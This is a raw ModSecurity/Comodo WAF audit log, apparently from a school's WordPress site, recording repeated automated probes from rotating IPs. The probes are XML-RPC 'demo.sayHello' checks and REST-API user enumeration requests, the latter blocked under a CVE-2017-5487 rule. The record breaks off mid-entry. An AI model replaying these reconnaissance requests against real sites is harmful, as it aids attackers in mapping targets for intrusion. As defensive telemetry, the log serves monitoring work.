1747445722255365 2270; combined=1181, p1=392, p2=759, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79c8031f-Z-- --6200914f-A-- [17/May/2025:08:35:25 +0700] aCfn3QTOsBn9MSWb6WJuvQAAAJA 103.236.140.4 44194 103.236.140.4 8181 --6200914f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6200914f-C-- demo.sayHello --6200914f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6200914f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445725809086 3350 (- - -) Stopwatch2: 1747445725809086 3350; combined=2659, p1=357, p2=2161, p3=22, p4=23, p5=57, sr=71, sw=39, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6200914f-Z-- --35e5af1e-A-- [17/May/2025:08:35:28 +0700] aCfn4ATOsBn9MSWb6WJuvgAAAI8 103.236.140.4 44196 103.236.140.4 8181 --35e5af1e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.107 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --35e5af1e-C-- demo.sayHello --35e5af1e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --35e5af1e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445728406090 5457 (- - -) Stopwatch2: 1747445728406090 5457; combined=4105, p1=513, p2=3353, p3=28, p4=31, p5=104, sr=83, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35e5af1e-Z-- --ab4e4f06-A-- [17/May/2025:08:35:59 +0700] aCfn_xKi5m5upc8uMd6iOAAAANc 103.236.140.4 44204 103.236.140.4 8181 --ab4e4f06-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ab4e4f06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab4e4f06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445759489229 3115 (- - -) Stopwatch2: 1747445759489229 3115; combined=1334, p1=425, p2=873, p3=0, p4=0, p5=35, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab4e4f06-Z-- --7d603f48-A-- [17/May/2025:08:35:59 +0700] aCfn_3yxdQCiyU1ENFcnxAAAAAw 103.236.140.4 44206 103.236.140.4 8181 --7d603f48-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7d603f48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d603f48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445759670493 2050 (- - -) Stopwatch2: 1747445759670493 2050; combined=950, p1=329, p2=594, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d603f48-Z-- --47ccda63-A-- [17/May/2025:08:35:59 +0700] aCfn_-m4kjNN-hEbWjJBJgAAAEw 103.236.140.4 44208 103.236.140.4 8181 --47ccda63-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --47ccda63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47ccda63-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445759789430 2127 (- - -) Stopwatch2: 1747445759789430 2127; combined=981, p1=326, p2=623, p3=0, p4=0, p5=31, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47ccda63-Z-- --901c163a-A-- [17/May/2025:08:36:04 +0700] aCfoBBKi5m5upc8uMd6iOQAAANg 103.236.140.4 44214 103.236.140.4 8181 --901c163a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --901c163a-C-- demo.sayHello --901c163a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --901c163a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445764707575 4754 (- - -) Stopwatch2: 1747445764707575 4754; combined=3593, p1=432, p2=2952, p3=25, p4=22, p5=94, sr=66, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --901c163a-Z-- --01ccb607-A-- [17/May/2025:08:36:06 +0700] aCfoBum4kjNN-hEbWjJBJwAAAE0 103.236.140.4 44216 103.236.140.4 8181 --01ccb607-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --01ccb607-C-- demo.sayHello --01ccb607-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --01ccb607-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445766946751 3732 (- - -) Stopwatch2: 1747445766946751 3732; combined=2834, p1=355, p2=2289, p3=18, p4=21, p5=90, sr=56, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01ccb607-Z-- --7734f705-A-- [17/May/2025:08:36:09 +0700] aCfoCem4kjNN-hEbWjJBKQAAAE8 103.236.140.4 44224 103.236.140.4 8181 --7734f705-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7734f705-C-- demo.sayHello --7734f705-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7734f705-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445769493211 6659 (- - -) Stopwatch2: 1747445769493211 6659; combined=4691, p1=579, p2=3870, p3=36, p4=39, p5=99, sr=80, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7734f705-Z-- --a55d9511-A-- [17/May/2025:08:36:29 +0700] aCfoHem4kjNN-hEbWjJBKgAAAFE 103.236.140.4 44228 103.236.140.4 8181 --a55d9511-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a55d9511-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a55d9511-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445789105277 15507 (- - -) Stopwatch2: 1747445789105277 15507; combined=25749, p1=482, p2=903, p3=0, p4=0, p5=12197, sr=82, sw=1, l=0, gc=12166 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a55d9511-Z-- --1685ee28-A-- [17/May/2025:08:36:36 +0700] aCfoJATOsBn9MSWb6WJuwwAAAIE 103.236.140.4 44232 103.236.140.4 8181 --1685ee28-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1685ee28-C-- demo.sayHello --1685ee28-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1685ee28-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445796090285 6614 (- - -) Stopwatch2: 1747445796090285 6614; combined=4797, p1=592, p2=3964, p3=39, p4=43, p5=96, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1685ee28-Z-- --2eb0cc34-A-- [17/May/2025:08:36:51 +0700] aCfoMxKi5m5upc8uMd6iPAAAAMQ 103.236.140.4 44236 103.236.140.4 8181 --2eb0cc34-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2eb0cc34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2eb0cc34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445811558592 3182 (- - -) Stopwatch2: 1747445811558592 3182; combined=1400, p1=473, p2=895, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2eb0cc34-Z-- --1c243e17-A-- [17/May/2025:08:36:55 +0700] aCfoN-m4kjNN-hEbWjJBLAAAAFQ 103.236.140.4 44240 103.236.140.4 8181 --1c243e17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1c243e17-C-- demo.sayHello --1c243e17-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c243e17-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445815176111 6530 (- - -) Stopwatch2: 1747445815176111 6530; combined=4734, p1=617, p2=3840, p3=38, p4=43, p5=131, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c243e17-Z-- --a6bae97e-A-- [17/May/2025:08:37:05 +0700] aCfoQem4kjNN-hEbWjJBLgAAAFY 103.236.140.4 44244 103.236.140.4 8181 --a6bae97e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a6bae97e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6bae97e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445825799493 3537 (- - -) Stopwatch2: 1747445825799493 3537; combined=1493, p1=512, p2=944, p3=0, p4=0, p5=37, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6bae97e-Z-- --79c8031f-A-- [17/May/2025:08:37:14 +0700] aCfoSum4kjNN-hEbWjJBMgAAAEE 103.236.140.4 44254 103.236.140.4 8181 --79c8031f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --79c8031f-C-- demo.sayHello --79c8031f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --79c8031f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445834356212 6621 (- - -) Stopwatch2: 1747445834356212 6621; combined=4793, p1=616, p2=3936, p3=40, p4=42, p5=95, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79c8031f-Z-- --c0059439-A-- [17/May/2025:08:38:09 +0700] aCfogem4kjNN-hEbWjJBNQAAAEc 103.236.140.4 44260 103.236.140.4 8181 --c0059439-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.30 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c0059439-C-- demo.sayHello --c0059439-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0059439-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445889471698 5777 (- - -) Stopwatch2: 1747445889471698 5777; combined=4155, p1=568, p2=3368, p3=32, p4=34, p5=91, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0059439-Z-- --d6951436-A-- [17/May/2025:08:39:05 +0700] aCfouem4kjNN-hEbWjJBNwAAAEg 103.236.140.4 44264 103.236.140.4 8181 --d6951436-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d6951436-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6951436-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445945282459 3269 (- - -) Stopwatch2: 1747445945282459 3269; combined=1355, p1=468, p2=857, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6951436-Z-- --17589e7c-A-- [17/May/2025:08:39:11 +0700] aCfov-m4kjNN-hEbWjJBOQAAAEo 103.236.140.4 44268 103.236.140.4 8181 --17589e7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.155 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --17589e7c-C-- demo.sayHello --17589e7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --17589e7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file 